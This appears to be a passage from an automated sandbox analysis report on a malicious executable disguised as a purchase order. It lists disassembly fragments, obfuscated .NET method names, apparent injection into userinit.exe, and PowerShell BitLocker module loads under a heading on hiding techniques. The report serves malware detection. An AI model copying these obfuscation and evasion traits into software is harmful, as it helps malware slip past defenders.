            Source: 14.2.firefox.exe.2055cd14.0.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: PO23100072.exeStatic PE information: 0x9BF3D476 [Thu Nov 28 23:08:38 2052 UTC]
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 0_2_00E7EE10 pushfd ; iretd 0_2_00E7EE11
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0041A87D push esp; retf 5_2_0041A87E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0040710D pushfd ; retf 5_2_0040710E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_00423916 push esi; retf 5_2_0042392E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_00423923 push esi; retf 5_2_0042392E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004031D0 push eax; ret 5_2_004031D2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_00418B76 push ebx; retf 5_2_00418B77
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0041A3C1 push edi; retf 5_2_0041A3C7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004143E3 push edi; iretd 5_2_004143EF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_00417BE6 push es; ret 5_2_00417BE7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_00411DA3 push edi; iretd 5_2_00411DAF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A09AD push ecx; mov dword ptr [esp], ecx5_2_017A09B6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_037309AD push ecx; mov dword ptr [esp], ecx9_2_037309B6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03020743 push esi; retf 9_2_0302075B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03020750 push esi; retf 9_2_0302075B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0300EBD0 push edi; iretd 9_2_0300EBDC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03014A13 push es; ret 9_2_03014A14
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03020A5C push C67CA722h; ret 9_2_03020A61
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03020962 push cs; retf 9_2_03020963
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03011210 push edi; iretd 9_2_0301121C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_030171EE push edi; retf 9_2_030171F4
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0302152D push ecx; retf 9_2_03021576
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_030215D5 push edi; ret 9_2_030215D9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_030159A3 push ebx; retf 9_2_030159A4
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03003F3A pushfd ; retf 9_2_03003F3B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0300DE35 push ecx; retf 9_2_0300DE92
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0300DE40 push ecx; retf 9_2_0300DE92
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A65192 push eax; ret 9_2_03A65194
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A54762 push es; ret 9_2_03A54766
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_03A54FFC pushad ; retf 9_2_03A5502B
            Source: PO23100072.exeStatic PE information: section name: .text entropy: 7.864814644611974
            Source: 0.2.PO23100072.exe.6cc0000.2.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.PO23100072.exe.6cc0000.2.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.PO23100072.exe.2b39890.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.PO23100072.exe.2b39890.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, C6NmqQYn2FoWfIvl2m.csHigh entropy of concatenated method names: 'Y4P122TBmN', 'SmY1PeiB1t', 'CkY1ZwrTbj', 'Q39ZeYCeIu', 'Pl7ZzPfdQe', 'qxw17HchRX', 'YKB19f4k6S', 'gLb1lwOvbD', 'O3I1QItfCE', 'vaB1wo7NB5'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, cEpaBxiqWvHD9jf5MO.csHigh entropy of concatenated method names: 'tmJ6DWmhAQ', 'v9J6OBPMSn', 'ydH6HUHvlJ', 'a9C6yVgNq2', 'f516AI1D9C', 'tu86Gfo5e6', 'Nbu6MYbFyi', 'pRc6VoaPAB', 'A3t6oIhNZ8', 'Tkr6eyKwZA'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, WfsGnTVNWYHG6SXTyt.csHigh entropy of concatenated method names: 'Ysfr0etR37', 'nNlrqqX5ML', 'F99Pgli0hO', 'CcoPjU2Hp6', 'm16PT4loVX', 'UyqPhmuOFQ', 'OIlPUL2mKM', 'vPMPKdlXCN', 'guvPW1sVpH', 'hAqPFGgYGn'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, FmQnAFzC4FJxGdUYtJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CakNSoEXIY', 'EabNtEH2Sb', 'ttnN8oVIGl', 'VmnN5C1Pji', 'YQJNLIsGxn', 'jXtNNLyRrG', 'S5lNErnZ5h'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, ET77VE7h4DEq42BG9V.csHigh entropy of concatenated method names: 'WiTus52rg', 'bnRYpkudt', 'DRFipn56Q', 'mjpqYWCY9', 'JcFpuNx4O', 'OWtCm4dl6', 'T6gEFkCsW0OGf5eSCC', 'CMh8eDM3QNDUULbFQE', 'AqkQ5foFUY02mVRcYa', 'H1aLCcIjT'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, u6opQHRPu9bZrqjnJ5.csHigh entropy of concatenated method names: 'i6d91NEcoK', 'Ueq9muLsEZ', 'dMV9dDWpAA', 'jRi9cqAE2n', 'Kh99tFKQIv', 'NVn98ny3dH', 'DceUgIlHvlU6tFT4ao', 'Q09NOikKmYQFWEGhZB', 'xbK99UDDnW', 'X0n9Qwj2rU'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, cIMrfI8YECZUoy9Wgk.csHigh entropy of concatenated method names: 'JgoZJ3fL4P', 'eGwZ6a06No', 'axoZrEtCcN', 'tZrZ1dywZp', 'jkNZmPvHgK', 'am4rAlMXO4', 'XgZrGlxSuP', 'rVJrMda7Dw', 'iGBrVU0Mhh', 'ROdro9QmTp'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, XZB4Cn2bUjvIHWj8tZ.csHigh entropy of concatenated method names: 'iGrSxP7X1d', 'bX1SprgHw8', 'vi5SIOVi0w', 'lAbSX51Kjj', 'pb2SjEEYvq', 'PIESTMVtV4', 'mbaSU53rFm', 'cbuSKDlKOf', 'UfQSFdT0KD', 'LZFSbtSyU0'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, DGCpBKjFiN3cjsLhahD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FEtEDiHBGN', 'RW3EOXvpG6', 'rZMEHmh5Wf', 'FqjEyDWOUq', 'NZVEAeakcv', 'Y0tEGNKSum', 'vF2EMCq03v'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, HvjtEwgXNFP1Ejj43r.csHigh entropy of concatenated method names: 'WWZN9oRhMG', 'mANNQ44osc', 'Ve4Nwa5RK2', 'GcRN2hnbpY', 'DmBN6N0HoV', 'do0Nr5aR3q', 'Fe6NZk29i6', 'imdLMpcB0U', 'wjvLVU3M2H', 'WAdLoYFdQZ'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, suu9lcpNXLTZRyxhpD.csHigh entropy of concatenated method names: 'Dispose', 'ktp9otp1lG', 'x9FlXYcOWP', 'AOpvvss1Y0', 'YRF9eTH5y5', 'L5e9zKDNYj', 'ProcessDialogKey', 'olGl7Cca8F', 'inMl9dRwu3', 'ghfllI10hr'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, ErvP1ejqAeKv9bwmA53.csHigh entropy of concatenated method names: 'msUN4EUVJn', 'jIXNBJfnoq', 'PkNNuDHkoj', 'tE7NYWWBen', 'ysLN0qUqrT', 'pRRNi1oEdm', 'pmHNqdbLL8', 'njjNx7SrVP', 'pd4NpieI7m', 'gFiNCOkCNg'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, PjJNapMWqQ1Lcx9igK.csHigh entropy of concatenated method names: 'ShL5dww45t', 'sq95cATYdk', 'ToString', 'XFb52TBXxP', 'DTW56AVkmo', 'qQQ5PwFSwy', 'swk5rZ0tM0', 'ejy5ZeBl33', 'AoG51qRB6H', 'w7r5msZ4LZ'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, UfRHtJwdLtkkprZP2g.csHigh entropy of concatenated method names: 'SwBPYOnWHK', 'BwpPiXXI2i', 'e8fPxgWtZE', 'q6vPp932Ua', 'HRdPtLHLo1', 'XZLP8bKPCF', 'xABP5JE9gL', 'XRSPLvdaF9', 'sU2PNPwrQL', 'FKvPEAHBGa'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, VY0SSpQPiA9ZClro7m.csHigh entropy of concatenated method names: 'DS45VpILY5', 'oZD5eFh3p8', 'w6BL7Fieqd', 'DuaL9wkHnJ', 'sBs5b7Nu9X', 'uDt5nny504', 'Agj5REk7o6', 'zr35DGcVHE', 'caU5OSyS81', 'FYh5Hcts9C'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, FldoPTJeiKlcRyRj5A.csHigh entropy of concatenated method names: 'ToString', 'vKH8bBmrcZ', 'Sec8XHRqAm', 'RWK8gbNkU0', 'CYC8jQouk6', 'a8f8TXSIwE', 'A238hqYHOQ', 'HtN8UtJdqY', 'u0R8K1wGos', 'wgu8WPKL1i'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, gvwuXNde5HTNSILvwD.csHigh entropy of concatenated method names: 'G5n148fkm5', 'XNA1B5SnvA', 'iBn1uUbamI', 'bPj1YjmAdf', 'lSU10Kfs1G', 'Fcu1isJ9v0', 'oLN1q8I2h2', 'DoE1x5IXKb', 'dD01pSH1TS', 'NsP1CIOTuJ'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.csHigh entropy of concatenated method names: 'nkMQJ04NRr', 'cD4Q25MjlT', 'aviQ6SNniG', 'rDEQP4SJ52', 'Cf0QrFcGVL', 'OYeQZqZjHg', 'WsAQ1dQc5i', 'rFfQmjiA1a', 'i1MQa9kma7', 'xqBQdIADV1'
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, wP2dKuGdngn9aF68qX.csHigh entropy of concatenated method names: 'fOUL2IbdtD', 'Si6L6uAdUl', 'gybLP88qXH', 'eamLrIl2Vl', 'XhyLZ0ptb4', 'o11L1cZ0FR', 'jEdLmHyV8v', 'jc3LaNDfxt', 'KZTLdIGOCp', 'NLyLc2nFTX'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, C6NmqQYn2FoWfIvl2m.csHigh entropy of concatenated method names: 'Y4P122TBmN', 'SmY1PeiB1t', 'CkY1ZwrTbj', 'Q39ZeYCeIu', 'Pl7ZzPfdQe', 'qxw17HchRX', 'YKB19f4k6S', 'gLb1lwOvbD', 'O3I1QItfCE', 'vaB1wo7NB5'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, cEpaBxiqWvHD9jf5MO.csHigh entropy of concatenated method names: 'tmJ6DWmhAQ', 'v9J6OBPMSn', 'ydH6HUHvlJ', 'a9C6yVgNq2', 'f516AI1D9C', 'tu86Gfo5e6', 'Nbu6MYbFyi', 'pRc6VoaPAB', 'A3t6oIhNZ8', 'Tkr6eyKwZA'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, WfsGnTVNWYHG6SXTyt.csHigh entropy of concatenated method names: 'Ysfr0etR37', 'nNlrqqX5ML', 'F99Pgli0hO', 'CcoPjU2Hp6', 'm16PT4loVX', 'UyqPhmuOFQ', 'OIlPUL2mKM', 'vPMPKdlXCN', 'guvPW1sVpH', 'hAqPFGgYGn'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, FmQnAFzC4FJxGdUYtJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CakNSoEXIY', 'EabNtEH2Sb', 'ttnN8oVIGl', 'VmnN5C1Pji', 'YQJNLIsGxn', 'jXtNNLyRrG', 'S5lNErnZ5h'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, ET77VE7h4DEq42BG9V.csHigh entropy of concatenated method names: 'WiTus52rg', 'bnRYpkudt', 'DRFipn56Q', 'mjpqYWCY9', 'JcFpuNx4O', 'OWtCm4dl6', 'T6gEFkCsW0OGf5eSCC', 'CMh8eDM3QNDUULbFQE', 'AqkQ5foFUY02mVRcYa', 'H1aLCcIjT'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, u6opQHRPu9bZrqjnJ5.csHigh entropy of concatenated method names: 'i6d91NEcoK', 'Ueq9muLsEZ', 'dMV9dDWpAA', 'jRi9cqAE2n', 'Kh99tFKQIv', 'NVn98ny3dH', 'DceUgIlHvlU6tFT4ao', 'Q09NOikKmYQFWEGhZB', 'xbK99UDDnW', 'X0n9Qwj2rU'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, cIMrfI8YECZUoy9Wgk.csHigh entropy of concatenated method names: 'JgoZJ3fL4P', 'eGwZ6a06No', 'axoZrEtCcN', 'tZrZ1dywZp', 'jkNZmPvHgK', 'am4rAlMXO4', 'XgZrGlxSuP', 'rVJrMda7Dw', 'iGBrVU0Mhh', 'ROdro9QmTp'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, XZB4Cn2bUjvIHWj8tZ.csHigh entropy of concatenated method names: 'iGrSxP7X1d', 'bX1SprgHw8', 'vi5SIOVi0w', 'lAbSX51Kjj', 'pb2SjEEYvq', 'PIESTMVtV4', 'mbaSU53rFm', 'cbuSKDlKOf', 'UfQSFdT0KD', 'LZFSbtSyU0'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, DGCpBKjFiN3cjsLhahD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FEtEDiHBGN', 'RW3EOXvpG6', 'rZMEHmh5Wf', 'FqjEyDWOUq', 'NZVEAeakcv', 'Y0tEGNKSum', 'vF2EMCq03v'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, HvjtEwgXNFP1Ejj43r.csHigh entropy of concatenated method names: 'WWZN9oRhMG', 'mANNQ44osc', 'Ve4Nwa5RK2', 'GcRN2hnbpY', 'DmBN6N0HoV', 'do0Nr5aR3q', 'Fe6NZk29i6', 'imdLMpcB0U', 'wjvLVU3M2H', 'WAdLoYFdQZ'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, suu9lcpNXLTZRyxhpD.csHigh entropy of concatenated method names: 'Dispose', 'ktp9otp1lG', 'x9FlXYcOWP', 'AOpvvss1Y0', 'YRF9eTH5y5', 'L5e9zKDNYj', 'ProcessDialogKey', 'olGl7Cca8F', 'inMl9dRwu3', 'ghfllI10hr'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, ErvP1ejqAeKv9bwmA53.csHigh entropy of concatenated method names: 'msUN4EUVJn', 'jIXNBJfnoq', 'PkNNuDHkoj', 'tE7NYWWBen', 'ysLN0qUqrT', 'pRRNi1oEdm', 'pmHNqdbLL8', 'njjNx7SrVP', 'pd4NpieI7m', 'gFiNCOkCNg'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, PjJNapMWqQ1Lcx9igK.csHigh entropy of concatenated method names: 'ShL5dww45t', 'sq95cATYdk', 'ToString', 'XFb52TBXxP', 'DTW56AVkmo', 'qQQ5PwFSwy', 'swk5rZ0tM0', 'ejy5ZeBl33', 'AoG51qRB6H', 'w7r5msZ4LZ'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, UfRHtJwdLtkkprZP2g.csHigh entropy of concatenated method names: 'SwBPYOnWHK', 'BwpPiXXI2i', 'e8fPxgWtZE', 'q6vPp932Ua', 'HRdPtLHLo1', 'XZLP8bKPCF', 'xABP5JE9gL', 'XRSPLvdaF9', 'sU2PNPwrQL', 'FKvPEAHBGa'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, VY0SSpQPiA9ZClro7m.csHigh entropy of concatenated method names: 'DS45VpILY5', 'oZD5eFh3p8', 'w6BL7Fieqd', 'DuaL9wkHnJ', 'sBs5b7Nu9X', 'uDt5nny504', 'Agj5REk7o6', 'zr35DGcVHE', 'caU5OSyS81', 'FYh5Hcts9C'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, FldoPTJeiKlcRyRj5A.csHigh entropy of concatenated method names: 'ToString', 'vKH8bBmrcZ', 'Sec8XHRqAm', 'RWK8gbNkU0', 'CYC8jQouk6', 'a8f8TXSIwE', 'A238hqYHOQ', 'HtN8UtJdqY', 'u0R8K1wGos', 'wgu8WPKL1i'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, gvwuXNde5HTNSILvwD.csHigh entropy of concatenated method names: 'G5n148fkm5', 'XNA1B5SnvA', 'iBn1uUbamI', 'bPj1YjmAdf', 'lSU10Kfs1G', 'Fcu1isJ9v0', 'oLN1q8I2h2', 'DoE1x5IXKb', 'dD01pSH1TS', 'NsP1CIOTuJ'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.csHigh entropy of concatenated method names: 'nkMQJ04NRr', 'cD4Q25MjlT', 'aviQ6SNniG', 'rDEQP4SJ52', 'Cf0QrFcGVL', 'OYeQZqZjHg', 'WsAQ1dQc5i', 'rFfQmjiA1a', 'i1MQa9kma7', 'xqBQdIADV1'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, wP2dKuGdngn9aF68qX.csHigh entropy of concatenated method names: 'fOUL2IbdtD', 'Si6L6uAdUl', 'gybLP88qXH', 'eamLrIl2Vl', 'XhyLZ0ptb4', 'o11L1cZ0FR', 'jEdLmHyV8v', 'jc3LaNDfxt', 'KZTLdIGOCp', 'NLyLc2nFTX'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
